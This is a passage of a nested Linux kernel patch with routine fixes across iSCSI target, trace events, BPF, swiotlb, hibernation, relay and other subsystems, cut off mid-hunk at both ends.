++#define ACP_SCRATCH_REG_51                            0x00100CC
++#define ACP_SCRATCH_REG_52                            0x00100D0
++#define ACP_SCRATCH_REG_53                            0x00100D4
++#define ACP_SCRATCH_REG_54                            0x00100D8
++#define ACP_SCRATCH_REG_55                            0x00100DC
++#define ACP_SCRATCH_REG_56                            0x00100E0
++#define ACP_SCRATCH_REG_57                            0x00100E4
++#define ACP_SCRATCH_REG_58                            0x00100E8
++#define ACP_SCRATCH_REG_59                            0x00100EC
++#define ACP_SCRATCH_REG_60                            0x00100F0
++#define ACP_SCRATCH_REG_61                            0x00100F4
++#define ACP_SCRATCH_REG_62                            0x00100F8
++#define ACP_SCRATCH_REG_63                            0x00100FC
++#define ACP_SCRATCH_REG_64                            0x0010100
++#define ACP_SCRATCH_REG_65                            0x0010104
++#define ACP_SCRATCH_REG_66                            0x0010108
++#define ACP_SCRATCH_REG_67                            0x001010C
++#define ACP_SCRATCH_REG_68                            0x0010110
++#define ACP_SCRATCH_REG_69                            0x0010114
++#define ACP_SCRATCH_REG_70                            0x0010118
++#define ACP_SCRATCH_REG_71                            0x001011C
++#define ACP_SCRATCH_REG_72                            0x0010120
++#define ACP_SCRATCH_REG_73                            0x0010124
++#define ACP_SCRATCH_REG_74                            0x0010128
++#define ACP_SCRATCH_REG_75                            0x001012C
++#define ACP_SCRATCH_REG_76                            0x0010130
++#define ACP_SCRATCH_REG_77                            0x0010134
++#define ACP_SCRATCH_REG_78                            0x0010138
++#define ACP_SCRATCH_REG_79                            0x001013C
++#define ACP_SCRATCH_REG_80                            0x0010140
++#define ACP_SCRATCH_REG_81                            0x0010144
++#define ACP_SCRATCH_REG_82                            0x0010148
++#define ACP_SCRATCH_REG_83                            0x001014C
++#define ACP_SCRATCH_REG_84                            0x0010150
++#define ACP_SCRATCH_REG_85                            0x0010154
++#define ACP_SCRATCH_REG_86                            0x0010158
++#define ACP_SCRATCH_REG_87                            0x001015C
++#define ACP_SCRATCH_REG_88                            0x0010160
++#define ACP_SCRATCH_REG_89                            0x0010164
++#define ACP_SCRATCH_REG_90                            0x0010168
++#define ACP_SCRATCH_REG_91                            0x001016C
++#define ACP_SCRATCH_REG_92                            0x0010170
++#define ACP_SCRATCH_REG_93                            0x0010174
++#define ACP_SCRATCH_REG_94                            0x0010178
++#define ACP_SCRATCH_REG_95                            0x001017C
++#define ACP_SCRATCH_REG_96                            0x0010180
++#define ACP_SCRATCH_REG_97                            0x0010184
++#define ACP_SCRATCH_REG_98                            0x0010188
++#define ACP_SCRATCH_REG_99                            0x001018C
++#define ACP_SCRATCH_REG_100                           0x0010190
++#define ACP_SCRATCH_REG_101                           0x0010194
++#define ACP_SCRATCH_REG_102                           0x0010198
++#define ACP_SCRATCH_REG_103                           0x001019C
++#define ACP_SCRATCH_REG_104                           0x00101A0
++#define ACP_SCRATCH_REG_105                           0x00101A4
++#define ACP_SCRATCH_REG_106                           0x00101A8
++#define ACP_SCRATCH_REG_107                           0x00101AC
++#define ACP_SCRATCH_REG_108                           0x00101B0
++#define ACP_SCRATCH_REG_109                           0x00101B4
++#define ACP_SCRATCH_REG_110                           0x00101B8
++#define ACP_SCRATCH_REG_111                           0x00101BC
++#define ACP_SCRATCH_REG_112                           0x00101C0
++#define ACP_SCRATCH_REG_113                           0x00101C4
++#define ACP_SCRATCH_REG_114                           0x00101C8
++#define ACP_SCRATCH_REG_115                           0x00101CC
++#define ACP_SCRATCH_REG_116                           0x00101D0
++#define ACP_SCRATCH_REG_117                           0x00101D4
++#define ACP_SCRATCH_REG_118                           0x00101D8
++#define ACP_SCRATCH_REG_119                           0x00101DC
++#define ACP_SCRATCH_REG_120                           0x00101E0
++#define ACP_SCRATCH_REG_121                           0x00101E4
++#define ACP_SCRATCH_REG_122                           0x00101E8
++#define ACP_SCRATCH_REG_123                           0x00101EC
++#define ACP_SCRATCH_REG_124                           0x00101F0
++#define ACP_SCRATCH_REG_125                           0x00101F4
++#define ACP_SCRATCH_REG_126                           0x00101F8
++#define ACP_SCRATCH_REG_127                           0x00101FC
++#define ACP_SCRATCH_REG_128                           0x0010200
++#endif
+diff --git a/include/target/iscsi/iscsi_target_core.h b/include/target/iscsi/iscsi_target_core.h
+index 94d06ddfd80ad..229118156a1f6 100644
+--- a/include/target/iscsi/iscsi_target_core.h
++++ b/include/target/iscsi/iscsi_target_core.h
+@@ -600,6 +600,7 @@ struct iscsit_conn {
+ 	struct iscsi_tpg_np	*tpg_np;
+ 	/* Pointer to parent session */
+ 	struct iscsit_session	*sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	int			bitmap_id;
+ 	int			rx_thread_active;
+ 	struct task_struct	*rx_thread;
+diff --git a/include/target/target_core_base.h b/include/target/target_core_base.h
+index 8c920456edd93..010e966aee0a5 100644
+--- a/include/target/target_core_base.h
++++ b/include/target/target_core_base.h
+@@ -492,6 +492,7 @@ struct se_cmd {
+ 	struct se_lun		*se_lun;
+ 	/* Only used for internal passthrough and legacy TCM fabric modules */
+ 	struct se_session	*se_sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_tmr_req	*se_tmr_req;
+ 	struct llist_node	se_cmd_list;
+ 	struct completion	*free_compl;
+@@ -617,22 +618,26 @@ static inline struct se_node_acl *fabric_stat_to_nacl(struct config_item *item)
+ 			acl_fabric_stat_group);
+ }
+ 
+-struct se_session {
++struct target_cmd_counter {
++	struct percpu_ref	refcnt;
++	wait_queue_head_t	refcnt_wq;
++	struct completion	stop_done;
+ 	atomic_t		stopped;
++};
++
++struct se_session {
+ 	u64			sess_bin_isid;
+ 	enum target_prot_op	sup_prot_ops;
+ 	enum target_prot_type	sess_prot_type;
+ 	struct se_node_acl	*se_node_acl;
+ 	struct se_portal_group *se_tpg;
+ 	void			*fabric_sess_ptr;
+-	struct percpu_ref	cmd_count;
+ 	struct list_head	sess_list;
+ 	struct list_head	sess_acl_list;
+ 	spinlock_t		sess_cmd_lock;
+-	wait_queue_head_t	cmd_count_wq;
+-	struct completion	stop_done;
+ 	void			*sess_cmd_map;
+ 	struct sbitmap_queue	sess_tag_pool;
++	struct target_cmd_counter *cmd_cnt;
+ };
+ 
+ struct se_device;
+@@ -865,6 +870,7 @@ struct se_device {
+ 	struct rcu_head		rcu_head;
+ 	int			queue_cnt;
+ 	struct se_device_queue	*queues;
++	struct mutex		lun_reset_mutex;
+ };
+ 
+ struct se_hba {
+diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h
+index 38f0662476d14..b188b1e90e1ed 100644
+--- a/include/target/target_core_fabric.h
++++ b/include/target/target_core_fabric.h
+@@ -133,7 +133,12 @@ struct se_session *target_setup_session(struct se_portal_group *,
+ 				struct se_session *, void *));
+ void target_remove_session(struct se_session *);
+ 
+-int transport_init_session(struct se_session *se_sess);
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt);
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt);
++struct target_cmd_counter *target_alloc_cmd_counter(void);
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt);
++
++void transport_init_session(struct se_session *se_sess);
+ struct se_session *transport_alloc_session(enum target_prot_op);
+ int transport_alloc_session_tags(struct se_session *, unsigned int,
+ 		unsigned int);
+@@ -149,9 +154,11 @@ void	transport_deregister_session_configfs(struct se_session *);
+ void	transport_deregister_session(struct se_session *);
+ 
+ 
+-void	__target_init_cmd(struct se_cmd *,
+-		const struct target_core_fabric_ops *,
+-		struct se_session *, u32, int, int, unsigned char *, u64);
++void	__target_init_cmd(struct se_cmd *cmd,
++		const struct target_core_fabric_ops *tfo,
++		struct se_session *sess, u32 data_length, int data_direction,
++		int task_attr, unsigned char *sense_buffer, u64 unpacked_lun,
++		struct target_cmd_counter *cmd_cnt);
+ int	target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 		unsigned char *sense, u64 unpacked_lun, u32 data_length,
+ 		int task_attr, int data_dir, int flags);
+diff --git a/include/trace/events/qrtr.h b/include/trace/events/qrtr.h
+index b1de14c3bb934..441132c67133f 100644
+--- a/include/trace/events/qrtr.h
++++ b/include/trace/events/qrtr.h
+@@ -10,15 +10,16 @@
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -36,15 +37,16 @@ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -62,15 +64,16 @@ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+ TRACE_EVENT(qrtr_ns_server_add,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 2e713a7d9aa3a..3e8619c72f774 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -371,7 +371,8 @@ TRACE_EVENT(itimer_expire,
+ 		tick_dep_name(PERF_EVENTS)		\
+ 		tick_dep_name(SCHED)			\
+ 		tick_dep_name(CLOCK_UNSTABLE)		\
+-		tick_dep_name_end(RCU)
++		tick_dep_name(RCU)			\
++		tick_dep_name_end(RCU_EXP)
+ 
+ #undef tick_dep_name
+ #undef tick_dep_mask_name
+diff --git a/include/trace/stages/stage5_get_offsets.h b/include/trace/stages/stage5_get_offsets.h
+index fba4c24ed9e60..def36fbb8c5cd 100644
+--- a/include/trace/stages/stage5_get_offsets.h
++++ b/include/trace/stages/stage5_get_offsets.h
+@@ -9,17 +9,30 @@
+ #undef __entry
+ #define __entry entry
+ 
++/*
++ * Fields should never declare an array: i.e. __field(int, arr[5])
++ * If they do, it will cause issues in parsing and possibly corrupt the
++ * events. To prevent that from happening, test the sizeof() a fictitious
++ * type called "struct _test_no_array_##item" which will fail if "item"
++ * contains array elements (like "arr[5]").
++ *
++ * If you hit this, use __array(int, arr, 5) instead.
++ */
+ #undef __field
+-#define __field(type, item)
++#define __field(type, item)					\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_ext
+-#define __field_ext(type, item, filter_type)
++#define __field_ext(type, item, filter_type)			\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct
+-#define __field_struct(type, item)
++#define __field_struct(type, item)				\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct_ext
+-#define __field_struct_ext(type, item, filter_type)
++#define __field_struct_ext(type, item, filter_type)		\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __array
+ #define __array(type, item, len)
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index 5655e89b962be..d4d4fa0bb362e 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -181,6 +181,7 @@ struct btrfs_scrub_progress {
+ };
+ 
+ #define BTRFS_SCRUB_READONLY	1
++#define BTRFS_SCRUB_SUPPORTED_FLAGS	(BTRFS_SCRUB_READONLY)
+ struct btrfs_ioctl_scrub_args {
+ 	__u64 devid;				/* in */
+ 	__u64 start;				/* in */
+diff --git a/include/uapi/linux/const.h b/include/uapi/linux/const.h
+index af2a44c08683d..a429381e7ca50 100644
+--- a/include/uapi/linux/const.h
++++ b/include/uapi/linux/const.h
+@@ -28,7 +28,7 @@
+ #define _BITUL(x)	(_UL(1) << (x))
+ #define _BITULL(x)	(_ULL(1) << (x))
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
++#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (__typeof__(x))(a) - 1)
+ #define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ 
+ #define __KERNEL_DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))
+diff --git a/include/xen/xen.h b/include/xen/xen.h
+index a99bab8175234..b088f0d316892 100644
+--- a/include/xen/xen.h
++++ b/include/xen/xen.h
+@@ -71,4 +71,15 @@ static inline void xen_free_unpopulated_pages(unsigned int nr_pages,
+ }
+ #endif
+ 
++#if defined(CONFIG_XEN_DOM0) && defined(CONFIG_ACPI) && defined(CONFIG_X86)
++bool __init xen_processor_present(uint32_t acpi_id);
++#else
++#include <linux/bug.h>
++static inline bool xen_processor_present(uint32_t acpi_id)
++{
++	BUG();
++	return false;
++}
++#endif
++
+ #endif	/* _XEN_XEN_H */
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4426d0e15174f..cce95164204f3 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -562,7 +562,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
+ 		}
+ 
+ 		ctx->user_bufs[i] = imu;
+-		*io_get_tag_slot(ctx->buf_data, offset) = tag;
++		*io_get_tag_slot(ctx->buf_data, i) = tag;
+ 	}
+ 
+ 	if (needs_switch)
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index b73169737a01e..a8838a32f750e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -572,8 +572,8 @@ static s32 bpf_find_btf_id(const char *name, u32 kind, struct btf **btf_p)
+ 			*btf_p = btf;
+ 			return ret;
+ 		}
+-		spin_lock_bh(&btf_idr_lock);
+ 		btf_put(btf);
++		spin_lock_bh(&btf_idr_lock);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	return ret;
+@@ -5333,12 +5333,8 @@ struct btf *bpf_prog_get_target_btf(const struct bpf_prog *prog)
+ 
+ static bool is_int_ptr(struct btf *btf, const struct btf_type *t)
+ {
+-	/* t comes in already as a pointer */
+-	t = btf_type_by_id(btf, t->type);
+-
+-	/* allow const */
+-	if (BTF_INFO_KIND(t->info) == BTF_KIND_CONST)
+-		t = btf_type_by_id(btf, t->type);
++	/* skip modifiers */
++	t = btf_type_skip_modifiers(btf, t->type, NULL);
+ 
+ 	return btf_type_is_int(t);
+ }
+@@ -7961,12 +7957,10 @@ check_modules:
+ 		btf_get(mod_btf);
+ 		spin_unlock_bh(&btf_idr_lock);
+ 		cands = bpf_core_add_cands(cands, mod_btf, btf_nr_types(main_btf));
+-		if (IS_ERR(cands)) {
+-			btf_put(mod_btf);
++		btf_put(mod_btf);
++		if (IS_ERR(cands))
+ 			return ERR_CAST(cands);
+-		}
+ 		spin_lock_bh(&btf_idr_lock);
+-		btf_put(mod_btf);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	/* cands is a pointer to kmalloced memory here if cands->cnt > 0
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index bf2fdb33fb313..819f011f0a9cd 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1921,14 +1921,17 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	if (ctx.optlen > max_optlen || ctx.optlen < 0) {
++	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+ 
+ 	if (ctx.optlen != 0) {
+-		if (copy_to_user(optval, ctx.optval, ctx.optlen) ||
+-		    put_user(ctx.optlen, optlen)) {
++		if (optval && copy_to_user(optval, ctx.optval, ctx.optlen)) {
++			ret = -EFAULT;
++			goto out;
++		}
++		if (put_user(ctx.optlen, optlen)) {
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8db2ed564939b..8726161076134 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1590,9 +1590,9 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
+ 	struct tnum var64_off = tnum_intersect(reg->var_off,
+ 					       tnum_range(reg->umin_value,
+ 							  reg->umax_value));
+-	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
+-						tnum_range(reg->u32_min_value,
+-							   reg->u32_max_value));
++	struct tnum var32_off = tnum_intersect(tnum_subreg(var64_off),
++					       tnum_range(reg->u32_min_value,
++							  reg->u32_max_value));
+ 
+ 	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
+ }
+@@ -3518,17 +3518,13 @@ static int check_stack_read(struct bpf_verifier_env *env,
+ 	}
+ 	/* Variable offset is prohibited for unprivileged mode for simplicity
+ 	 * since it requires corresponding support in Spectre masking for stack
+-	 * ALU. See also retrieve_ptr_limit().
++	 * ALU. See also retrieve_ptr_limit(). The check in
++	 * check_stack_access_for_ptr_arithmetic() called by
++	 * adjust_ptr_min_max_vals() prevents users from creating stack pointers
++	 * with variable offsets, therefore no check is required here. Further,
++	 * just checking it here would be insufficient as speculative stack
++	 * writes could still lead to unsafe speculative behaviour.
+ 	 */
+-	if (!env->bypass_spec_v1 && var_off) {
+-		char tn_buf[48];
+-
+-		tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
+-		verbose(env, "R%d variable offset stack access prohibited for !root, var_off=%s\n",
+-				ptr_regno, tn_buf);
+-		return -EACCES;
+-	}
+-
+ 	if (!var_off) {
+ 		off += reg->var_off.value;
+ 		err = check_stack_read_fixed_off(env, state, off, size,
+@@ -11908,10 +11904,11 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 		state_reg = state->regs;
+ 		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+-				verbose(env, "frame %d: propagating r%d\n", i, fr);
++				verbose(env, "frame %d: propagating r%d\n", fr, i);
+ 			err = mark_chain_precision_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -11922,11 +11919,12 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 				continue;
+ 			state_reg = &state->stack[i].spilled_ptr;
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+ 				verbose(env, "frame %d: propagating fp%d\n",
+-					(-i - 1) * BPF_REG_SIZE, fr);
++					fr, (-i - 1) * BPF_REG_SIZE);
+ 			err = mark_chain_precision_stack_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index 339a990554e7f..7f4ad5e70b40c 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -919,7 +919,9 @@ EXPORT_SYMBOL_GPL(is_swiotlb_active);
+ 
+ static int io_tlb_used_get(void *data, u64 *val)
+ {
+-	*val = mem_used(&io_tlb_default_mem);
++	struct io_tlb_mem *mem = data;
++
++	*val = mem_used(mem);
+ 	return 0;
+ }
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_io_tlb_used, io_tlb_used_get, NULL, "%llu\n");
+@@ -932,7 +934,7 @@ static void swiotlb_create_debugfs_files(struct io_tlb_mem *mem,
+ 		return;
+ 
+ 	debugfs_create_ulong("io_tlb_nslabs", 0400, mem->debugfs, &mem->nslabs);
+-	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, NULL,
++	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, mem,
+ 			&fops_io_tlb_used);
+ }
+ 
+@@ -987,6 +989,11 @@ static int rmem_swiotlb_device_init(struct reserved_mem *rmem,
+ 	/* Set Per-device io tlb area to one */
+ 	unsigned int nareas = 1;
+ 
++	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
++		dev_err(dev, "Restricted DMA pool must be accessible within the linear mapping.");
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * Since multiple devices can share the same pool, the private data,
+ 	 * io_tlb_mem struct, will be initialized by the first device attached
+@@ -1048,11 +1055,6 @@ static int __init rmem_swiotlb_setup(struct reserved_mem *rmem)
+ 	    of_get_flat_dt_prop(node, "no-map", NULL))
+ 		return -EINVAL;
+ 
+-	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
+-		pr_err("Restricted DMA pool must be accessible within the linear mapping.");
+-		return -EINVAL;
+-	}
+-
+ 	rmem->ops = &rmem_swiotlb_ops;
+ 	pr_info("Reserved memory: created restricted DMA pool at %pa, size %ld MiB\n",
+ 		&rmem->base, (unsigned long)rmem->size / SZ_1M);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 7699b99706ad4..934332b3eb541 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -9254,8 +9254,8 @@ __perf_event_account_interrupt(struct perf_event *event, int throttle)
+ 		hwc->interrupts = 1;
+ 	} else {
+ 		hwc->interrupts++;
+-		if (unlikely(throttle
+-			     && hwc->interrupts >= max_samples_per_tick)) {
++		if (unlikely(throttle &&
++			     hwc->interrupts > max_samples_per_tick)) {
+ 			__this_cpu_inc(perf_throttled_count);
+ 			tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
+ 			hwc->interrupts = MAX_INTERRUPTS;
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 54d077e1a2dc7..5a60cc52adc0c 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -337,11 +337,20 @@ static void delay_access(int type)
+  */
+ static __always_inline u64 read_instrumented_memory(const volatile void *ptr, size_t size)
+ {
++	/*
++	 * In the below we don't necessarily need the read of the location to
++	 * be atomic, and we don't use READ_ONCE(), since all we need for race
++	 * detection is to observe 2 different values.
++	 *
++	 * Furthermore, on certain architectures (such as arm64), READ_ONCE()
++	 * may turn into more complex instructions than a plain load that cannot
++	 * do unaligned accesses.
++	 */
+ 	switch (size) {
+-	case 1:  return READ_ONCE(*(const u8 *)ptr);
+-	case 2:  return READ_ONCE(*(const u16 *)ptr);
+-	case 4:  return READ_ONCE(*(const u32 *)ptr);
+-	case 8:  return READ_ONCE(*(const u64 *)ptr);
++	case 1:  return *(const volatile u8 *)ptr;
++	case 2:  return *(const volatile u16 *)ptr;
++	case 4:  return *(const volatile u32 *)ptr;
++	case 8:  return *(const volatile u64 *)ptr;
+ 	default: return 0; /* Ignore; we do not diff the values. */
+ 	}
+ }
+diff --git a/kernel/kheaders.c b/kernel/kheaders.c
+index 8f69772af77b4..42163c9e94e55 100644
+--- a/kernel/kheaders.c
++++ b/kernel/kheaders.c
+@@ -26,15 +26,15 @@ asm (
+ "	.popsection				\n"
+ );
+ 
+-extern char kernel_headers_data;
+-extern char kernel_headers_data_end;
++extern char kernel_headers_data[];
++extern char kernel_headers_data_end[];
+ 
+ static ssize_t
+ ikheaders_read(struct file *file,  struct kobject *kobj,
+ 	       struct bin_attribute *bin_attr,
+ 	       char *buf, loff_t off, size_t len)
+ {
+-	memcpy(buf, &kernel_headers_data + off, len);
++	memcpy(buf, &kernel_headers_data[off], len);
+ 	return len;
+ }
+ 
+@@ -48,8 +48,8 @@ static struct bin_attribute kheaders_attr __ro_after_init = {
+ 
+ static int __init ikheaders_init(void)
+ {
+-	kheaders_attr.size = (&kernel_headers_data_end -
+-			      &kernel_headers_data);
++	kheaders_attr.size = (kernel_headers_data_end -
++			      kernel_headers_data);
+ 	return sysfs_create_bin_file(kernel_kobj, &kheaders_attr);
+ }
+ 
+diff --git a/kernel/power/hibernate.c b/kernel/power/hibernate.c
+index 793c55a2becba..30d1274f03f62 100644
+--- a/kernel/power/hibernate.c
++++ b/kernel/power/hibernate.c
+@@ -64,6 +64,7 @@ enum {
+ static int hibernation_mode = HIBERNATION_SHUTDOWN;
+ 
+ bool freezer_test_done;
++bool snapshot_test;
+ 
+ static const struct platform_hibernation_ops *hibernation_ops;
+ 
+@@ -687,18 +688,22 @@ static int load_image_and_restore(void)
+ {
+ 	int error;
+ 	unsigned int flags;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	pm_pr_dbg("Loading hibernation image.\n");
+ 
+ 	lock_device_hotplug();
+ 	error = create_basic_memory_bitmaps();
+ 	if (error) {
+-		swsusp_close(FMODE_READ | FMODE_EXCL);
++		swsusp_close(mode);
+ 		goto Unlock;
+ 	}
+ 
+ 	error = swsusp_read(&flags);
+-	swsusp_close(FMODE_READ | FMODE_EXCL);
++	swsusp_close(mode);
+ 	if (!error)
+ 		error = hibernation_restore(flags & SF_PLATFORM_MODE);
+ 
+@@ -716,7 +721,6 @@ static int load_image_and_restore(void)
+  */
+ int hibernate(void)
+ {
+-	bool snapshot_test = false;
+ 	unsigned int sleep_flags;
+ 	int error;
+ 
+@@ -744,6 +748,9 @@ int hibernate(void)
+ 	if (error)
+ 		goto Exit;
+ 
++	/* protected by system_transition_mutex */
++	snapshot_test = false;
++
+ 	lock_device_hotplug();
+ 	/* Allocate memory management structures */
+ 	error = create_basic_memory_bitmaps();
+@@ -940,6 +947,8 @@ static int software_resume(void)
+ 	 */
+ 	mutex_lock_nested(&system_transition_mutex, SINGLE_DEPTH_NESTING);
+ 
++	snapshot_test = false;
++
+ 	if (swsusp_resume_device)
+ 		goto Check_image;
+ 
+diff --git a/kernel/power/power.h b/kernel/power/power.h
+index b4f4339432096..b83c8d5e188de 100644
+--- a/kernel/power/power.h
++++ b/kernel/power/power.h
+@@ -59,6 +59,7 @@ asmlinkage int swsusp_save(void);
+ 
+ /* kernel/power/hibernate.c */
+ extern bool freezer_test_done;
++extern bool snapshot_test;
+ 
+ extern int hibernation_snapshot(int platform_mode);
+ extern int hibernation_restore(int platform_mode);
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index 277434b6c0bfd..cc44c37699de6 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -1518,9 +1518,13 @@ int swsusp_check(void)
+ {
+ 	int error;
+ 	void *holder;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	hib_resume_bdev = blkdev_get_by_dev(swsusp_resume_device,
+-					    FMODE_READ | FMODE_EXCL, &holder);
++					    mode, &holder);
+ 	if (!IS_ERR(hib_resume_bdev)) {
+ 		set_blocksize(hib_resume_bdev, PAGE_SIZE);
+ 		clear_page(swsusp_header);
+@@ -1547,7 +1551,7 @@ int swsusp_check(void)
+ 
+ put:
+ 		if (error)
+-			blkdev_put(hib_resume_bdev, FMODE_READ | FMODE_EXCL);
++			blkdev_put(hib_resume_bdev, mode);
+ 		else
+ 			pr_debug("Image signature found, resuming\n");
+ 	} else {
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 14d9384fba056..ce34ca0b5b985 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -665,6 +665,7 @@ void __rcu_irq_enter_check_tick(void)
+ 	}
+ 	raw_spin_unlock_rcu_node(rdp->mynode);
+ }
++NOKPROBE_SYMBOL(__rcu_irq_enter_check_tick);
+ #endif /* CONFIG_NO_HZ_FULL */
+ 
+ /*
+diff --git a/kernel/relay.c b/kernel/relay.c
+index 88bcb09f0a1f2..1cb4bb9f09a34 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -989,7 +989,8 @@ static size_t relay_file_read_start_pos(struct rchan_buf *buf)
+ 	size_t subbuf_size = buf->chan->subbuf_size;
+ 	size_t n_subbufs = buf->chan->n_subbufs;
+ 	size_t consumed = buf->subbufs_consumed % n_subbufs;
+-	size_t read_pos = consumed * subbuf_size + buf->bytes_consumed;
++	size_t read_pos = (consumed * subbuf_size + buf->bytes_consumed)
++			% (n_subbufs * subbuf_size);
+ 
+ 	read_subbuf = read_pos / subbuf_size;
+ 	padding = buf->padding[read_subbuf];
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 9ae8f41e3372f..f7d381b6c3133 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2246,6 +2246,7 @@ static struct rq *find_lock_later_rq(struct task_struct *task, struct rq *rq)
+ 				     !cpumask_test_cpu(later_rq->cpu, &task->cpus_mask) ||
